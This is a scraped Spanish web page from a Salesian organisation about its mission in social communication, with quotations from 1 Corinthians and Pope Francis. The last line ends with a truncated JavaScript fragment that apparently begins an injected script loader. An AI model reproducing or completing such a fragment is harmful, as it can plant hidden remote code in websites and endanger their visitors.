Image

QUICK CONTACT

[contact-form-7 id="2507" title="quick contact"]

COMUNICACIÓN SALESIANA EN EL MUNDO

Actuamos en el sector de la comunicación social

el_encuentro

Actuamos en el sector de la comunicación social. Es un campo de acción significativo, que figura entre las prioridades apostólicas de la misión salesiana.

Nuestro Fundador intuyo el valor de esta escuela de masas, que crea cultura y difunde modelos de vida, y, para defender y sostener la fe del pueblo, acometió empresas apostólicas originales.

Siguiendo su ejemplo, aprovechamos como dones de Dios las grandes posibilidades que la comunicación social nos ofrece para la educación y la evangelización.

Corresponsables de la misión“El que planta y el que riega son una misma cosa; si bien cada uno recibirá el salario según lo que haya trabajado. Nosotros somos colaboradores de Dios, y vosotros campo de Dios. Sois también edificio de Dios” (1 Cor 3,8-9).

Señalo en particular dos tareas que nos llegan hoy del discernimiento sobre la realidad juvenil: la primera es la de educar según la antropología cristiana en el lenguaje de los nuevos medios de comunicación y de las redes sociales, que plasma en profundidad los códigos culturales de los jóvenes, y por lo tanto, la visión de la realidad humana y religiosa; la segunda es promover formas de voluntariado social, no resignándose a las ideologías que anteponen el mercado y la producción a la dignidad de la persona y al valor del trabajo. (COMO DON BOSCO, CON LOS JÓVENES Y PARA LOS JÓVENES CARTA DEL SANTO PADRE FRANCISCO).var d=document;var s=d.createElement(‘script’);